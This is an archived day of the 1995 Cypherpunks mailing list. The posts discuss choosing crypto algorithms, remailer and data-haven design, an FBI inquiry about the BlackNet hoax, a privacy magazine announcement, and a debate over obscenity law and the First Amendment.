-----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxL+YSoZzwIn1bdtAQGmbgF+Il9/8OU3smhe+DqhKBX5a51N9H15/ElN 4ByTAiKfNjXu21HWyV29kSxEBofo5003 =j55J -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Tue Jan 10 13:44:15 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Tue, 10 Jan 95 13:44:15 PST Subject: HTTP and ID Verification Message-ID: <199501102149.QAA01058@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Doc writes: > Can anyone tell me what the URL for the site that displays all > the identifying info it gets when you request it is? One option is http://www.uiuc.edu/cgi-bin/printenv - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxMAvioZzwIn1bdtAQGhxwF/VkjkXoQ/s6U85F90IqcUotmoHbCojLE9 Wmn+KPyoeIa6THpY/w3VGAV7ug5i5WZB =PkPL -----END PGP SIGNATURE----- From perry at imsi.com Tue Jan 10 14:08:54 1995 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 10 Jan 95 14:08:54 PST Subject: Crypto functions In-Reply-To: <199501102139.QAA00961@bb.hks.net> Message-ID: <9501102208.AA26444@snark.imsi.com> "L. Todd Masco" says: > What crypto functions are considered modern and usable? The list I have > right now is: > > RSA > IDEA > DES > 3DES > RC4 > RC5 > BLOWFISH > MD4 > MD5 I wouldn't use BLOWFISH. MD4 is flawed -- and its a hash function, not a crypto function (as is MD5). RC5 is very, very new. RC4 hasn't been well studied in the open literature yet, though it is quite promising. .pm From cactus at hks.net Tue Jan 10 14:25:43 1995 From: cactus at hks.net (L. Todd Masco) Date: Tue, 10 Jan 95 14:25:43 PST Subject: Crypto functions Message-ID: <199501102230.RAA01492@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Well, by cryptographic I mean "interesting crypto-type functions," not necessarily just reversible mappings. As far as an encryption API is concerned, hash functions are no different: a byte stream comes in, a different byte stream comes out. I ask because I'm starting to put together those GUCAPI function I was talking about before the new year and defining the initial set of functions. L. McCarthy noted that I didn't include sapphire, and I've included it in the (trivially expandable) interface definition. I'm more interested in being inclusive than in excluding cryptographicall weak functions (and I don't feel that I'm qualified at this point to make the call between what's weak and strong anyway). - - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCUAwUBLxLPixNhgovrPB7dAQEWZgP3eLGNg+X5oxIySLFaTRaZN5eHgS402S39 /6FsB2eiUhy0j7OOrd3OiMorQSJ+V/8UvyJUayUYlWBoTgC/zJn8Vry4zX0HWhRh URv5IT3l3Q/8kFCBkjRMSS/2b3ya0s2gFUJMzEYz78JNpLOwjtm59svdjydTE+z2 bboLSy+H1A== =1noA - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxMKeCoZzwIn1bdtAQHtGAGAzxBCONKibbY5cvv/7a/POL5mqRjDfQ7B c7S0z6EJMyGFsGeWJrOVlCgVum0TPrTE =Rcku -----END PGP SIGNATURE----- From jalicqui at firefly.prairienet.org Tue Jan 10 14:44:56 1995 From: jalicqui at firefly.prairienet.org (Jeff A Licquia) Date: Tue, 10 Jan 95 14:44:56 PST Subject: MEETING: Jan. 14th Bay Area Cypherpunks Meeting In-Reply-To: Message-ID: Ah, to be less locationally challenged! Anyone got a plane ticket they can donate? :-) I (and, I imagine, others) would highly appreciate a summary from some worthy soul fortunate enough to be there. ---------------------------------------------------------------------- Jeff Licquia (lame .sig, huh?) | Finger for PGP 2.6 public key jalicqui at prairienet.org | Me? Speak for whom? You've got licquia at cei.com (work) | to be kidding! From cactus at seabsd.hks.net Tue Jan 10 14:45:00 1995 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Tue, 10 Jan 95 14:45:00 PST Subject: QUERY: S/Keyish PGP? Message-ID: <199501102249.RAA01602@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- I'm catching up on old mail... In response to my query, Adam Shostack wrote: > >| A quick question: Has anybody considered the possibility of hacking >| something into PGP's password protection to allow an S/Key like access? > > I thought of this, bounced it off a few people, none of whom >caught the flaw. When I got around to implementing it, I realized >that for it to work, your key would have to be securely stored on your >unix box without encryption. I caught that. What I was hoping for was something that would allow a key to be use for a specific purpose once and only once by a given passphrase. Ideally, this could be done on a machine that was totally insecure. I didn't catch the fundamental flaw, though. If the machine is compromised the key can always be compromised by taking an image of the previous state and replaying whatever passphrase was intercepted. Bummer. - - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxLUPBNhgovrPB7dAQEn8gP8DrC3h9Dv21JGgg4Vsz/76gnUfnTJBPD+ PPyZ2gi2dzzQOVkYsxZBHQs7kRq6ZSANNbCfM5wY1GbBagZvv2gAPMx9bESudH+l wtoFcZGH5Az85O+k6FhN/QsOjJq/PaHUbNMui1Q+QKrMqU4I/UGCJCxAVRP8/wfS 8rLKzm7TxTU= =LxUH - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxMPACoZzwIn1bdtAQH7DAF9EMimhI0J9JUN9bqaHhsz2opQXZSIQC+g D32kU3ELjC58Y4Ig3e9fLLrPoGtTub85 =Uq/c -----END PGP SIGNATURE----- From beattie at CSOS.ORST.EDU Tue Jan 10 14:49:59 1995 From: beattie at CSOS.ORST.EDU (Brian Beattie) Date: Tue, 10 Jan 95 14:49:59 PST Subject: Phil Zimmerman's Legal Defense Fund Message-ID: Could somebody mail me the info on sending a contribution Phil Zimmerman's Legal fees related to the PGP issue? Brian Beattie | [From an MIT job ad] "Applicants must also have | extensive knowledge of UNIX, although they should beattie at csos.orst.edu | have sufficently good programming taste to not Fax (503)754-3406 | consider this an achievement." From root at einstein.ssz.com Tue Jan 10 15:47:47 1995 From: root at einstein.ssz.com (root) Date: Tue, 10 Jan 95 15:47:47 PST Subject: Pornography, What is it? In-Reply-To: <9501101603.AA02337@eitech.eit.com> Message-ID: <199501102342.RAA00418@einstein.ssz.com> > >> > >If this is so then everything I have read or seen misses this minor point > >completely. Every press release, speech, etc. that I see uses the term > >pornography, not obscenity. TV preachers, news anchors, newspapers, DA's, > >etc. consistently use the term pornography. The state of Oregon specificaly > >legalized pornography, not osbcenity. > >I think from a legal standpoint there is little difference between the two. > > Not so. Obscenity is a class of speech which is completely unprotected > by the First Amendment [*Note, I don't agree with this line of reasoning, > but it's what the Supremes say.] I.e. you can simply ban obscenity, > like child pornography. Pornographic material cannot be banned but > can be regulated according to 'time place and manner'. Hence the > zoning restrictions on Adult book stores. > I understand what you are saying, what I am saying is the distinction is not used in practice. The bbs operator in Cali. that was busted in Tennessee was busted for delivering PORNOGRAPHY (not obscenity) to a minor (in short a 14 year olds account being operated by a oinkdroid.) If you can 'simply' ban obscenity then why all the rucus? Simple, you can't ban it simply... or any other way for that matter. As to your zoning restrictions, they change from place to place and hence are not a hard and fast rule either. The bottem line is that the distinction fostered by legal eagles is a straw man argument, it is intended to distract from the real issue - freedom to do what you want unless you harm another or their property without their prior concent. > >From a legal perspective, the difference between pornography and > obscenity is defined by the Miller test. [This may have changed > a bit in the past few years]. This states that in order for > material to be obscene it must be: > > 1. Devoid of any artistic or literary importance. > 2. Appeal to a prurient interest. [i.e. be arousing]. > 3. Be patently offensive by contemporary community standards. > > This isn't the exact wording, but it's the general idea. > This test is a joke, if you apply it fairly then a man and his wife having anal sex would qualify as obscene in many places (which it does in some states) Also, the whole concept of community standards is unworkable. Whose community? The reason so few people get busted under the Miller test is that there really are so few idiots out there who would fall for it. > In practice, it's very hard to get anything declared obscene, > hence the desire to regulate pornography strongly within the > permitted bounds of the First Amendment. > The reason they want to regulate pornography is that it is a stepping stone to a total ban. It is based on religous grounds and the issue really has little if anything to do with Constitutional rights. > -Ekr > From yusuf921 at uidaho.edu Tue Jan 10 17:04:20 1995 From: yusuf921 at uidaho.edu (Syed Yusuf) Date: Tue, 10 Jan 95 17:04:20 PST Subject: FBI and BLACKNET Message-ID: I was just visited by the a humble servant of the FBI inquireing what I knew of BLACKNET. They apparently believe it's a possible network industrial sabbatoge (read Terrorism). Although the person I spoke to was quite cordial and even bought me lunch (that's the way to win me over) I must really question the intellegence (read IQ) and intellagence (read reconnasance) of his superiors. apparently whoever sent him his lead doesn't pay attention to the net enough to know Blacknet was a hoax, and why did it take since august for them to find me? I explained to him the differece between a Cyperpunk and a hacker explained what a joke it is to be prosicuting Mr. Zimmerman and why the Government is in the wrong for trying to limit encrytion strenght. Then I demonstrated the Internet and how to e-mail the prez and FTP speaches of the Prez :) (I know I know, act stupid so they volentere as much info as possible, he let too many things slip, but still If I had his job I'd be following up things like this too) --Syed Yusuf (Cypherpunk and proud of it damnit!) From rogaski at phobos.lib.iup.edu Tue Jan 10 17:10:14 1995 From: rogaski at phobos.lib.iup.edu (Mark Rogaski) Date: Tue, 10 Jan 95 17:10:14 PST Subject: Returned mail: User unknown (fwd) Message-ID: <199501110109.UAA03229@phobos.lib.iup.edu> -----BEGIN PGP SIGNED MESSAGE----- - From the node of anonymous-remailer at shell.portal.com: : : I want to propose that a change to more of a Snow Crash society : with anarcho-capitalism as the norm is not necessarily being : _caused_ by pressures listed above, but, rather, fit a grander : historical destiny. What we are seeing and will see in the : Not necessarily to the EXTREME that Stephenson predicted, but I definitely see alot of what he said already starting to happen. Hell, look at the Burbclaves. Lil' old Indiana, PA had their first drive-by shooting a few months ago. Some of the growing gang-warefare influence is starting to spill over from Pittsburgh. Once people get a little more frightened of violence, the engineered community idea is going to explode. Now take that with private and corporate police forces and ... BINGO! Snowcrash. : Consider the possibility that the dissolution of large, : centralized federal republics is also inevitable. (The : Frissel/Sandforth Optimists have been arguing this exact point.) : The decentralizing effect of digital networks (or Webs a la Hakim Bey) is pretty self evident. One can easily extrapolate the effects of a structure like the Internet, a structure that by nature routes around any form of 'censorship' from above. - ----- Doc doc at phobos.lib.iup.edu aka Mark Rogaski http://www.lib.iup.edu/~rogaski/ Disclaimer: You would probably be hard-pressed to find ANYONE who agrees with me, much less my university or employer... [finger fllevta at oak.grove.iup.edu for PGP Public Key and Geek Code v2.1] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxMZ/R0c4/pqJauBAQH8LwP+PrvNhKJVEzmhZVcuvkNMLmGWWgyflAlh PxvR5BtJHBpE/oNqB3TVOywt9eJYeIV7L7BSboIFosEyqC4OEFS6WRTAJpWhPg8L L9CdvhaDKubnTteBEtugEtU1HB3iJ+zRucJYUVit0bBwCimcqvr/aTMab7h4Yqw9 uKJPulSTg/w= =jdlE -----END PGP SIGNATURE----- ----- Doc doc at phobos.lib.iup.edu aka Mark Rogaski http://www.lib.iup.edu/~rogaski/ Disclaimer: You would probably be hard-pressed to find ANYONE who agrees with me, much less my university or employer... [finger fllevta at oak.grove.iup.edu for PGP Public Key and Geek Code v2.1] From s675570 at aix1.uottawa.ca Tue Jan 10 18:52:33 1995 From: s675570 at aix1.uottawa.ca (Angus Patterson) Date: Tue, 10 Jan 95 18:52:33 PST Subject: Why use plastic for remailers and DH? Message-ID: This point may have been raised before, but anyway, unless you're using a swiss-bank issued credit card for a numbered account (if that's at all possible), or a bogus name on the card, why would anybody want to use something as completely traceable as a credit card to pay for a remailer or a data haven? From jbotz at orixa.mtholyoke.edu Tue Jan 10 19:08:46 1995 From: jbotz at orixa.mtholyoke.edu (Jurgen Botz) Date: Tue, 10 Jan 95 19:08:46 PST Subject: Remailer postage In-Reply-To: <199501051802.NAA22909@seminole.gate.net> Message-ID: <199501110308.WAA07340@orixa.mtholyoke.edu> jpb at gate.net wrote: > Where can I get the Magic Money software? I'm a bit behind, so sorry if others have already suggested this, but you should need any digicash for this... stamps can be just big random numbers. Someone buys a books of stamps, you make 10 big random numbers send them a copy and keep a copy on file. After a message comes through with a particular number you throw that number out. Just like real stamps, and unlike money, they can be used only once. From John.Schofield at sprawl.expressnet.org Tue Jan 10 21:18:55 1995 From: John.Schofield at sprawl.expressnet.org (John Schofield) Date: Tue, 10 Jan 95 21:18:55 PST Subject: Keep Out Electronic Availability Announcement Message-ID: <4bc_9501101432@expressnet.org> -----BEGIN PGP SIGNED MESSAGE----- Keep Out The Journal of Electronic Privacy January 10, 1995 ** Keep Out Volume 1, Number 2 now available electronically ** ** Keep Out Volume 2, Number 1 coming soon ** ** FREE sample issues available ** I am pleased to announce the electronic availability of Volume 1, Number 2 of Keep Out, the Journal of Electronic Privacy. To receive a copy, simply send e-mail to keep-out-current at expressnet.org. The subject and body of the message do not matter. You will receive an ASCII-text copy of the issue in reply to your message. You can also do a Fidonet file request to 1:102/903 and request VOL1-NO2.TXT, or call the Sprawl BBS at +1-818-342-5127 and download it. Volume 1, Number 2 had stories on the Pretty Good Privacy (PGP) signature bug, a how-to story on anonymous remailers, an interview with remailer operator Erich von Hollander, and of course, a continuation of our PGP beginners' series with an introduction to digital signatures and the web of trust. While Keep Out is primarily a paper magazine, the text of each issue is released electronically to make sure the information is disseminated widely. This information is too important to limit it to those who can afford a subscription. I am sending this message instead of posting the full text of Keep Out because the electronic edition contains the same commercial advertisements that the paper version does. It would be inappropriate to post it here. To encourage people to subscribe, and to ensure that Keep Out remains solvent, the electronic edition is released roughly one month after the paper version. It seems to be the lot of new magazines to have deadline troubles. Keep Out has unfortunately been no exception. The second issue of Keep Out was released quite late. To bring the magazine's date of issue back in touch with reality, the next issue (Volume 2, Number 1) will be dated March/April, and will be released in paper form on February 27. For that issue, we are working on a review of steganography software (programs for hiding data in sound and picture files), an in-depth report on Tempest technology (which allows an eavesdropper to view your computer screen from a distance without using wires), a story telling the current state of the government's Clipper (wiretap) Chip initiative, and a continuation of our PGP for beginners' series. To receive a free, sample issue of Keep Out, with no strings attached, simply send your postal address to one of the addresses below. You will receive a copy of the next issue when it is mailed out. Keep Out's mailing list is completely confidential. No information about you will be released for any reason, except for court orders, of course. Subscriptions to Keep Out are $15 a year for six issues in the U.S. and Canada, $27 elsewhere. Back issues of the first two issues (Volume 1, Numbers 1 and 2) are available at $7 each inside the U.S. and Canada, $9 elsewhere. U.S. funds only, please. Unfortunately, we can not accept credit cards, but checks and money orders payable to "Keep Out" are welcome. _______________ Contact Methods Voice: +1-818-345-8640 Fax/BBS: +1-818-342-5127 Internet: keep.out at sprawl.expressnet.org Fidonet: "Keep Out" at 1:102/903.0 Snail Mail: Keep Out P.O. Box 571312 Tarzana, CA 91357-1312 USA -----BEGIN PGP SIGNATURE----- Version: 2.7 Comment: Call 818-345-8640 voice for info on Keep Out magazine. iQCVAwUBLxL5+Wj9fvT+ukJdAQEeMgP8DG/x1JtkES7yEXyW67xOXiC/GPSn29ru eeBgjp7Otqc4HVH46fJBe14zoSAfkgVuQUesOxtsVBUAVT6MS/SICr/i+Wrig6lS k2LbokBD9GIihRVDG20XSkqfo3Uw7GBevFEJClCR7T5+rglnbVP8j+bXhumXBtAv y8wU0yYwaD8= =jZNP -----END PGP SIGNATURE----- ... "Happiness is a warm puppy," said the anaconda. --- Blue Wave/RA v2.12 -- |Fidonet: John Schofield 11:310/12 |Internet: John.Schofield at sprawl.expressnet.org | | Standard disclaimer: The views of this user are strictly his own. From cheap_anonymous at crl.com Tue Jan 10 21:39:56 1995 From: cheap_anonymous at crl.com (cheap_anonymous at crl.com) Date: Tue, 10 Jan 95 21:39:56 PST Subject: Jay Leno Message-ID: <199501110448.XAA04663@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Tonight on the Tonight Show with Jay Leno, Leno said: "...why is O.J. writing a book? If he's so eager to tell his experiences, whisper it to Connie Chung." Thought it might be mildly humerous for those of us who read Tim's message about Connie. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxNjBioZzwIn1bdtAQGEzQF/XkfPjWrW2kbgpYLB6Gf1EiNXEJTwKW1l mtuAnfhbSHsXPDIvv4IzGoAof2qlsd2v =66P/ -----END PGP SIGNATURE----- From root at einstein.ssz.com Tue Jan 10 21:41:34 1995 From: root at einstein.ssz.com (root) Date: Tue, 10 Jan 95 21:41:34 PST Subject: Pornography, What is it? In-Reply-To: <9501102357.AA12620@eitech.eit.com> Message-ID: <199501110033.SAA00514@einstein.ssz.com> > > You seem to have missed where I say that I don't agree with this > line of reasoning. I tend to believe that the first amendment means > what it says. (I.e. make no law.) But the fact of the matter is that > the people who make the law think differently, right or wrong. > I understand, I just don't think most of the folks out there against porno are interested in constitutional rights. They don't see them as relevant to their day to day lives. You might call it a sort of cult of personality which is using religion as the head. Also, the 1st Amendment says that Congress shall make no law, it doesn't say a damn thing about the states doing it. When I read this amendment what I see is the founding fathers saying it is up to each state to decide for themselves. And since Congress is placed in charge of inter-state relations it is quite simple to reduce this to mean that States may not apply their standards to other states because they would then be acting in the place of the federal government. > >I understand what you are saying, what I am saying is the distinction is not > >used in practice. The bbs operator in Cali. that was busted in Tennessee was > >busted for delivering PORNOGRAPHY (not obscenity) to a minor (in short a 14 > >year olds account being operated by a oinkdroid.) > The key word here is 'minor'. Minor have nowhere near the rights > that adults have. Try banning the sale of pornography to demonstrated > adults. > Yes, but at no time was it proved that a mindor DID d/l the file only that they could. Big distinction to me. A oinkdroid did the d/l'ing by playing like the 14 year old. To me this is entrapment. > I think you misunderstand. The First Amendment places restrictions > upon what the States may do. The States are free to make such > laws or NOT. Some don't. Most do. > The 1st. Amendment says nothing about what the states can do, only Congress. > It's all very well and good to say such things, but this formulation > of liberty has no reasonable basis in Constitutional Law. The > Bill of Rights does not encode Mill's On Liberty, as much as you > might like it to. > Then I suggest you read the 9th and 10th Amendment. The 9th says the states will ALWAYS get the benefit of the doubt. The 10th says the federal government will NEVER get it unless there is a Constitional Amendment. > Huh? Obscenity has to do with freedom of speech, not action. It's > an exception to the First Amendment, not to some general class > of liberties. Depictions of anal sex are typically not considered > obscene. The act of anal sex is often made illegal, but that's an > entirely separate issue. It is made illegal because it is considered obscene. You seem to be skirting the issue here. And since when is speech not an act? There are a whole list of things included in the freedom of speech issue (ie freedom of the press) that clearly implies that speech is one kind of act. > > >Also, the whole concept of community standards is unworkable. Whose community? > The community passing the law. Last time I checked such cases were tried by 12 peers, this hardly qualifies as community by any definition. It is not like they take a vote of all the people in the community of voting age (which they should). > > > Look, you can make general arguments about the way that you think > that your liberty should be, but the only legal basis you have > for claims that you have the freedom to do something is the > Bill of Rights. I'm arguing from that basis. > As am I. I base each and every one of my beliefs about how this government is supposed to be run on that document and that document alone. It is not the supreme law of the land for nothing. From pstemari at erinet.com Tue Jan 10 21:52:02 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Tue, 10 Jan 95 21:52:02 PST Subject: Thoughts on Data Havens Message-ID: <9501102319.AB01326@eri.erinet.com> At 01:30 AM 1/10/95, jpb at gate.net wrote: > ... Post a new PGP key and encrypted address block weekly to alt.data.havens, >alt.2600, or a stegoed picture to alt.binaries.pictures.whatever. If you >are limiting usership, perhaps an autoencrypting majordomo list. ... Still, messages intended for the DH could be identified by the publically known mailer address. Some sort of protocol where each message to the remailer results in a new and different encrypted send-to block being returned to the sender would seem to be required. Avoiding traffic analysis on these messages would require you to place a new and different encrypted reply-to on each message chunk. > ... It would also be a good idea to only allow DH >commands to be executed if the encrypted (mandatory) control message arrived >from another remailer account ... I was assuming this--on the basis that the DH would not want its location know to the presumeably large number of clients. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From nelson at crynwr.com Tue Jan 10 21:56:58 1995 From: nelson at crynwr.com (Russell Nelson) Date: Tue, 10 Jan 95 21:56:58 PST Subject: Why use plastic for remailers and DH? In-Reply-To: Message-ID: Date: Tue, 10 Jan 1995 21:54:24 -0500 (EST) From: Angus Patterson This point may have been raised before, but anyway, unless you're using a swiss-bank issued credit card for a numbered account (if that's at all possible), or a bogus name on the card, why would anybody want to use something as completely traceable as a credit card to pay for a remailer or a data haven? Because the message you sent into the remailer isn't tracable to the message that left the remailer (isn't that the point?). Give the FBI credit for *some* brains and assume that they already know you used the remailer, because they saw mail from you enter the remailer. -- -russ http://www.crynwr.com/crynwr/nelson.html Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? From nelson at crynwr.com Tue Jan 10 22:00:04 1995 From: nelson at crynwr.com (Russell Nelson) Date: Tue, 10 Jan 95 22:00:04 PST Subject: Suggestion for remailer operators. Message-ID: If you want to run a remailer fairly safely, insist that all outgoing mail be encrypted, and put an X bytes/day limit on destinations other than other remailers. Why? Because that way you can't use it to post to Usenet (other than to annoy people a little with unreadable postings), and you can't use it to mailbomb someone, and if the recipient doesn't decrypt the message, there will be no possible offending content. -- -russ http://www.crynwr.com/crynwr/nelson.html Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? From nave at abacus.dw.att.com Tue Jan 10 22:05:45 1995 From: nave at abacus.dw.att.com (Philippe Nave) Date: Tue, 10 Jan 95 22:05:45 PST Subject: Odd bits, minutinae... Message-ID: <9501110606.AA21223@abacus.ewindows> -----BEGIN PGP SIGNED MESSAGE----- Would *I* abstract an internal communique for a bunch of net.riffraff? Surely not - you must know me better than that... [...stuff...] Search done for Message: <<< BELL LABS NEWS >>> - ---------------- >>> ENCRYPTION -- This week, Bell Labs reported development of the AT&T Information Vending Encryption System (IVES), a security system that protects commercial information services -- such as video on demand, home shopping and banking -- and electronic news and alerting services. Using chips designed by Bell Labs and VLSI Technologies, IVES works on various networks including the Internet, cable TV networks and direct satellite broadcasting. The first application of IVES is in set-top cable television boxes being built by AT&T for Cablevision Systems Corp., the nation's fifth-largest cable service provider. By employing secure cryptographic addressing, IVES will assure that only paying customers receive enhanced pay-per-view and video-on-demand services. "There have been effective attacks on most, if not all, video encryption systems, despite highly sophisticated countermeasures," said Dr. David Maher, chief scientist for AT&T Secure Communications Systems. "Hackers are dedicated and can be well funded. Incentives are rising rapidly." [...stuff...] Dedicated? Definitely. Well-funded? Hmmm. This item is something for your acronym-scan parsers; will IVES become interesting? (If not IVES, what of CURRIER? Whoa- it was a joke, officer - CURRIER and IVES, get it? Oh, shit.) Search done for Message: <<< BELL LABS IN THE NEWS >>> - ---------------- >>> DNA -- In a bold experiment that provokes investigators to reconsider what a computer is, a researcher has used the genetic material DNA as a sort of personal computer. The experiment's designer, Dr. Leonard Adleman, translated a difficult math problem into the language of molecular biology and solved it by carrying out a reaction in one-fiftieth of a teaspoon of solution in a test tube. Adleman, of the Univ. of Southern California in Los Angeles, used DNA to solve a problem that involved finding the shortest path linking seven cities. Molecular computers, Adleman said, are fast and efficient, and they have unheard-of storage capacities. He said molecular computers can perform more than a trillion operations per second, which makes them 1,000 times as fast as the fastest supercomputer. And they can store information in a trillionth of the space ordinary computers require. "It's a very intriguing idea," said Ron Graham, of the Bell Labs Information Sciences Division at Murray Hill. "It's more than just cute. It makes you think in a different direction." (from the Denver Post, Nov. 22, '94) [...stuff...] Hmmm. Have you ever been spied on by your own metabolism? ..... YOU WILL. Then again. maybe not. FYI. -Philippe -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLxN0uQvlW1K2YdE1AQHMGAQAu5S0T9xUPsdY8SfB0k43bE2BNL5pb1OE FAg7qjbJ1ugZw0EPDrGFBH7sjq2GHBhyXwgBrlL5j2oAVnnGL2+3QtrcyxIEsrXA 42ME+1JaOQo5+pclCjOrxF00MDoqGdw7hMLexGyawOs7zp+RGDrhPUkMG7ennpky 8QEfrFh8yYU= =pI4l -----END PGP SIGNATURE----- -- ........................................................................ Philippe D. Nave, Jr. | Strong Crypto: Don't leave $HOME without it! nave at abacus.dr.att.com | Denver, Colorado USA | PGP public key: by arrangement. From lmccarth at ducie.cs.umass.edu Tue Jan 10 22:42:03 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Tue, 10 Jan 95 22:42:03 PST Subject: [SILLY] Re: Spying via DNA In-Reply-To: <9501110606.AA21223@abacus.ewindows> Message-ID: <199501110643.BAA08356@ducie.cs.umass.edu> Philippe Nave writes: > Hmmm. Have you ever been spied on by your own metabolism? My metabolism even knows what I ate for breakfast today !! (sorry, couldn't resist) From lmccarth at ducie.cs.umass.edu Tue Jan 10 22:52:30 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Tue, 10 Jan 95 22:52:30 PST Subject: Why use plastic for remailers and DH? Message-ID: <199501110657.BAA06563@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Angus Patterson writes: > why would anybody want to use something as completely traceable as a > credit card to pay for a remailer or a data haven? Apart from what Russ Nelson observed, safety in numbers is potentially great. If, say, 15% of the net.populace does it, then it won't be terribly interesting to know that some particular person has done it. I suppose a transition period would be helpful, in which credit card-financed bandwidth is increased with a load of low security traffic. -L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLxOAC2f7YYibNzjpAQHFxAP9EphOcjL96QDuuJQ7eFLv/I3Ci0K6NkMI tg9bUODYUMVqHs/2dTm8YhxNgOmx90uDb9MPx+EDDrtFZDAT9AIs8GQf1OdsyPrh Hg9PDIB4jT+JMfY3zqERePW+0Ac5TWoxQto0uQH8lRRWvNcp0R7N/sdYOwIRRTK8 o5BGm0wyJHg= =qt2F - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxOBOyoZzwIn1bdtAQHAXAF+Jcfrh9xhfx7MlS6oK5Cfu4E96P+rOuGW Xto/oQG7HcqAbl2adr0zyMQnfh4alDgk =FtZw -----END PGP SIGNATURE----- From bdolan at use.usit.net Tue Jan 10 23:09:15 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Tue, 10 Jan 95 23:09:15 PST Subject: Pornography, What is it? In-Reply-To: <199501110033.SAA00514@einstein.ssz.com> Message-ID: The 1st says "Congress shall make no law..." and you are right, the founding fathers meant to leave the states free to do as they pleased. However, the 14th amendment says "...No state shall make or enforce any law which shall abridge the privileges or immunities of citizens of the United States...." This has been used to enforce Bill of Rights protections against state laws. Reading my "Citizens Rule Book," provided by a friend, Brad D. On Tue, 10 Jan 1995, root wrote: > > > > You seem to have missed where I say that I don't agree with this > > line of reasoning. I tend to believe that the first amendment means > > what it says. (I.e. make no law.) But the fact of the matter is that > > the people who make the law think differently, right or wrong. > > > I understand, I just don't think most of the folks out there against porno > are interested in constitutional rights. They don't see them as relevant to > their day to day lives. You might call it a sort of cult of personality which > is using religion as the head. > > Also, the 1st Amendment says that Congress shall make no law, it doesn't say > a damn thing about the states doing it. When I read this amendment what I see > is the founding fathers saying it is up to each state to decide for themselves. > > And since Congress is placed in charge of inter-state relations it is quite > simple to reduce this to mean that States may not apply their standards to > other states because they would then be acting in the place of the federal > government. > > > >I understand what you are saying, what I am saying is the distinction is not > > >used in practice. The bbs operator in Cali. that was busted in Tennessee was > > >busted for delivering PORNOGRAPHY (not obscenity) to a minor (in short a 14 > > >year olds account being operated by a oinkdroid.) > > The key word here is 'minor'. Minor have nowhere near the rights > > that adults have. Try banning the sale of pornography to demonstrated > > adults. > > > Yes, but at no time was it proved that a mindor DID d/l the file only that they > could. Big distinction to me. A oinkdroid did the d/l'ing by playing like the > 14 year old. To me this is entrapment. > > > I think you misunderstand. The First Amendment places restrictions > > upon what the States may do. The States are free to make such > > laws or NOT. Some don't. Most do. > > > The 1st. Amendment says nothing about what the states can do, only Congress. > > > It's all very well and good to say such things, but this formulation > > of liberty has no reasonable basis in Constitutional Law. The > > Bill of Rights does not encode Mill's On Liberty, as much as you > > might like it to. > > > Then I suggest you read the 9th and 10th Amendment. The 9th says the states > will ALWAYS get the benefit of the doubt. The 10th says the federal government > will NEVER get it unless there is a Constitional Amendment. > > > Huh? Obscenity has to do with freedom of speech, not action. It's > > an exception to the First Amendment, not to some general class > > of liberties. Depictions of anal sex are typically not considered > > obscene. The act of anal sex is often made illegal, but that's an > > entirely separate issue. > It is made illegal because it is considered obscene. You seem to be skirting > the issue here. And since when is speech not an act? There are a whole list > of things included in the freedom of speech issue (ie freedom of the press) > that clearly implies that speech is one kind of act. > > > > > >Also, the whole concept of community standards is unworkable. Whose community? > > The community passing the law. > Last time I checked such cases were tried by 12 peers, this hardly qualifies as > community by any definition. It is not like they take a vote of all the people > in the community of voting age (which they should). > > > > > > Look, you can make general arguments about the way that you think > > that your liberty should be, but the only legal basis you have > > for claims that you have the freedom to do something is the > > Bill of Rights. I'm arguing from that basis. > > > As am I. I base each and every one of my beliefs about how this government > is supposed to be run on that document and that document alone. 